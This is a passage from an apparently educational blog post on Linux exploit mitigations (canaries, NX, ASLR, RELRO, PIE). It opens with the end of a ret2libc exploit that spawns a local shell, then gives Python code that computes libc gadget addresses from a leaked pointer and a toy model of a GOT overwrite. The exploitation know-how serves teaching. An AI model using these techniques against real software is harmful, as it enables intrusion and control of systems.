input()  # optional pause, in case we want to attach gdb
io.readline()
io.sendline(payload)
io.interactive()
And the result:
└────╼ python3 exploit.py
[+] Starting local process '/home/danilo/tmp/test': pid 15432
[*] Switching to interactive mode
The buffer is:
$ whoami
danilo
$
Very nice! We managed to hijack the control flow and get a shell using libc code.
ASLR
Address Space Layout Randomization, or ASLR for short, would kill the technique used in the previous section. As the name implies, it randomizes the address space layout. This means that each time you run the program, the stack and heap will be at different addresses, and libc (and all other shared libraries) will be loaded at different random addresses too.
This kills our previous approach, since we relied on libc gadgets (and now we don’t know where they are) and on knowing the stack address (which will be different on every execution).
Or does it?
Bypassing ASLR?
There are two main ways to bypass ASLR. The first is leaking a libc address. If a single libc function address is leaked, we can subtract that function’s offset within libc (which is fixed for a given libc build) to get libc’s base address, and from there find out where all the gadgets are! However, that would depend on a second vulnerability to leak the address. This is not extremely improbable, but it will not happen in our silly example.
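To make the leak idea concrete, here is a Python sketch using numbers from this very post: with ASLR off, ldd placed libc at 0x7ffff79e2000, so execve and our two gadgets sit at fixed offsets from that base. Given one leaked execve address, everything else follows. The leaked value below is made up (built from one of the randomized ldd bases shown in the RELRO section), and the offsets are only valid for this particular libc build.

```python
# Values from this post: ldd output with ASLR off, plus the addresses
# found with gdb/peda on the same box.
LIBC_BASE_NO_ASLR = 0x7ffff79e2000
EXECVE_NO_ASLR = 0x7ffff7ac6c00
POP_RDI_NO_ASLR = 0x7ffff7a035bf
POP_RSI_NO_ASLR = 0x7ffff7a05eea

# Offsets inside this libc build never change; only the base does.
OFFSETS = {
    "execve": EXECVE_NO_ASLR - LIBC_BASE_NO_ASLR,
    "pop_rdi_ret": POP_RDI_NO_ASLR - LIBC_BASE_NO_ASLR,
    "pop_rsi_ret": POP_RSI_NO_ASLR - LIBC_BASE_NO_ASLR,
}


def rebase(leaked_execve: int) -> dict:
    """Recompute every address from a leaked runtime address of execve."""
    base = leaked_execve - OFFSETS["execve"]
    if base & 0xFFF:
        raise ValueError("libc base should be page aligned; wrong offset?")
    return {"base": base, **{name: base + off for name, off in OFFSETS.items()}}


if __name__ == "__main__":
    # Hypothetical leak from a run where libc was loaded at 0x7f5016311000.
    addrs = rebase(0x7f5016311000 + OFFSETS["execve"])
    for name, addr in addrs.items():
        print(f"{name:12} {addr:#x}")
```

The page-alignment check is a cheap sanity test: shared libraries are mapped at page boundaries, so a base whose low 12 bits are not zero means the offset (or the leak) is wrong.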
The other relies on reusing only the program’s own code. The .TEXT section is not randomized by ASLR (as long as the binary is not compiled as PIE), so we have our entire program to search for gadgets. Our silly example is not that long, though, meaning we won’t find many useful gadgets there.
It’s a shame that we will not demonstrate an ASLR bypass in this post. However, I’ll make room for one in the future. (Actually, I have been writing one for a while now and it should be out soon.)
RELRO
Before talking about RELRO, a word or two must be said about the Procedure Linkage Table (PLT) and the Global Offset Table (GOT). In our program we call the libc functions “printf” and “gets”. If ASLR is disabled, these libc functions will always have the same address, as can be seen with the ldd program:
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffff7ffa000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff79e2000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd3000)
Note that libc addresses remain the same on every execution. However, look what happens when ASLR is enabled:
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe4ed82000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5016311000)
/lib64/ld-linux-x86-64.so.2 (0x00007f5016702000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe621a3000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fc0abf36000)
/lib64/ld-linux-x86-64.so.2 (0x00007fc0ac327000)
└────╼ ldd test
linux-vdso.so.1 (0x00007ffe377ac000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1ec5854000)
/lib64/ld-linux-x86-64.so.2 (0x00007f1ec5c45000)
The addresses are different every time! Libc is loaded dynamically at runtime. This makes the program smaller and makes libc updates easier, as the program does not have to be recompiled upon every libc update. But when printf or gets is called, how does the program know which address to call?
Well, the PLT and the GOT are the answer. When the program calls a function, such as printf, it does not call libc’s function directly. Instead, it calls a stub in the PLT:
gdb-peda$ disass main
Dump of assembler code for function main:
...
0x000000000040055b <+46>: call 0x4003f0 <printf@plt>
...
Let’s see what’s up in 0x4003f0 address:
gdb-peda$ disass 0x4003f0
Dump of assembler code for function printf@plt:
0x00000000004003f0 <+0>: jmp QWORD PTR [rip+0x2005aa] # 0x6009a0
0x00000000004003f6 <+6>: push 0x0
0x00000000004003fb <+11>: jmp 0x4003e0
End of assembler dump.
If we disassemble 0x6009a0, we land in the GOT:
gdb-peda$ disass 0x6009a0
Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
0x0000000000600988: test al,0x7
0x000000000060098a: (bad)
0x000000000060098b: add BYTE PTR [rax],al
0x000000000060098d: add BYTE PTR [rax],al
0x000000000060098f: add BYTE PTR [rax+0x31],dh
0x0000000000600992: xor al,0x24
0x0000000000600994: in al,0x7f
0x0000000000600996: add BYTE PTR [rax],al
0x0000000000600998: rex clc
0x000000000060099a: adc ah,BYTE PTR [rsp+riz*8]
0x000000000060099d: jg 0x60099f
0x000000000060099f: add BYTE PTR [rax-0x41],dh
0x00000000006009a2: fsub DWORD PTR [rbx]
0x00000000006009a4: in al,0x7f
0x00000000006009a6: add BYTE PTR [rax],al
0x00000000006009a8: nop
0x00000000006009a9: jno 0x600985
0x00000000006009ab: and esp,esp
0x00000000006009ad: jg 0x6009af
0x00000000006009af: add BYTE PTR [rax],al
End of assembler dump.
So what the hell is that?
It is gibberish because 0x6009a0 does not hold code: it holds an address, which the jmp in the PLT stub reads and jumps to (x/gx 0x6009a0 would show it as a pointer). Since the linker does not know where printf will be at runtime, it creates a small stub for it in a memory region called the PLT. The stub jumps through an entry in the GOT, another memory region. That’s where things get interesting.
The first time printf is called, its GOT entry does not point to libc yet. Instead, it points back into the PLT (the push 0x0; jmp 0x4003e0 part), which hands control to the dynamic linker. The dynamic linker looks printf up in libc (this is called lazy binding), writes the address it found into the GOT entry and jumps to it. The next time printf is called, the GOT entry already holds the right address.
A possible attack is to overwrite the GOT entry for printf so that it points somewhere malicious (the PLT itself lives in read-only, executable memory). This can be achieved through an overflow or an arbitrary write, for instance.
When RELRO (Relocation Read-Only) is fully enabled, the dynamic linker resolves every symbol before main runs and then marks the GOT read-only, making the aforementioned attack impossible. The cost is the overhead of populating the entire GOT up front. (With partial RELRO, the GOT entries used for lazy binding stay writable.)
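Lazy binding and full RELRO can be sketched as a toy Python model (all names here are hypothetical, and the real dynamic linker works with raw addresses, not dictionaries): each GOT entry starts out pointing at a resolver, the first call patches it, and under full RELRO everything is resolved up front and the table is frozen, so an overwrite fails.

```python
from types import MappingProxyType

# Hypothetical stand-ins for the libc functions our program imports.
LIBC = {
    "printf": lambda text: f"printf({text!r})",
    "gets": lambda: "gets()",
}


class ToyProcess:
    """Toy model of PLT/GOT lazy binding and full RELRO."""

    def __init__(self, full_relro: bool = False):
        self.resolutions = 0
        if full_relro:
            # Resolve everything before "main", then make the table read-only.
            self.resolutions = len(LIBC)
            self.got = MappingProxyType(dict(LIBC))
        else:
            # Lazy binding: every entry starts out pointing at the resolver.
            self.got = {name: self._resolver(name) for name in LIBC}

    def _resolver(self, name: str):
        def resolve(*args):
            self.resolutions += 1
            self.got[name] = LIBC[name]  # patch the GOT entry for next time
            return LIBC[name](*args)
        return resolve

    def call_plt(self, name: str, *args):
        # A PLT stub boils down to "jmp *GOT[name]".
        return self.got[name](*args)


if __name__ == "__main__":
    proc = ToyProcess()
    proc.call_plt("printf", "hi")
    proc.call_plt("printf", "hi again")
    print(proc.resolutions)                        # 1: resolved only once
    proc.got["printf"] = lambda text: "hijacked!"  # GOT overwrite
    print(proc.call_plt("printf", "hi"))           # hijacked!
    hardened = ToyProcess(full_relro=True)
    try:
        hardened.got["printf"] = lambda text: "hijacked!"
    except TypeError:
        print("GOT is read-only")
```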
There’s no bypass to this mitigation that I know of. Except, of course, for using a different approach.
PIE
Position Independent Executables (PIE) provide an extra layer of protection which makes return oriented programming very difficult. We have seen that ASLR randomizes a few parts of the program, but an adversary may still use the .TEXT region for gadgets. A PIE binary can be loaded at a random base address, so with ASLR enabled the program’s own code and data are randomized too. This comes at a performance cost, which was significant on 32-bit x86 and is much smaller on x86-64.
To bypass this mitigation, one must have a leaked address to calculate the offset and compensate.
Conclusion
Let’s do a TL;DR here:
Stack canary
A semi-random 8-byte value placed before the return address, so that overwriting it through a stack buffer overflow is detected before the function returns.
Pros: very effective against stack buffer overflow. The performance overhead is minimal.
Cons: Does not protect against other memory corruption vulnerabilities.
Bypass: Leak the canary.
NX
Prevents a few regions of memory (such as the stack and heap) from being executed. With this mitigation, an adversary is unable to inject new code into the program and has to use a code-reuse attack.
Pros: makes it impossible to inject new code into the program. Prevents dangerous and unnecessary regions from being executed. The performance overhead is minimal.
Cons: does not offer much protection, as ret2libc is a fairly easy bypass.
Bypass: ret2libc, return oriented programming.
ASLR
Randomizes a few regions of the memory, such as stack, heap and libs.
Pros: effective at mitigating ret2libc attacks. It has some performance overhead, but not enough to be an issue.
Cons: does not prevent an adversary from using gadgets within the program itself (unless it is compiled as PIE).
Bypass: gadgets in the program and address leak.
RELRO
Constructs the GOT before the main function is called and makes it unwritable.
Pros: kills attacks which rely on overwriting the GOT.
Cons: other attacks are still possible. There’s a performance overhead.
Bypass: none. Perhaps use another approach?
PIE
Lets the program itself be loaded at a random address, so its code and data are randomized along with everything else.
Pros: very effective against code-reuse attacks (such as return oriented programming).
Cons: some performance overhead (most noticeable on 32-bit x86).
Bypass: address leak.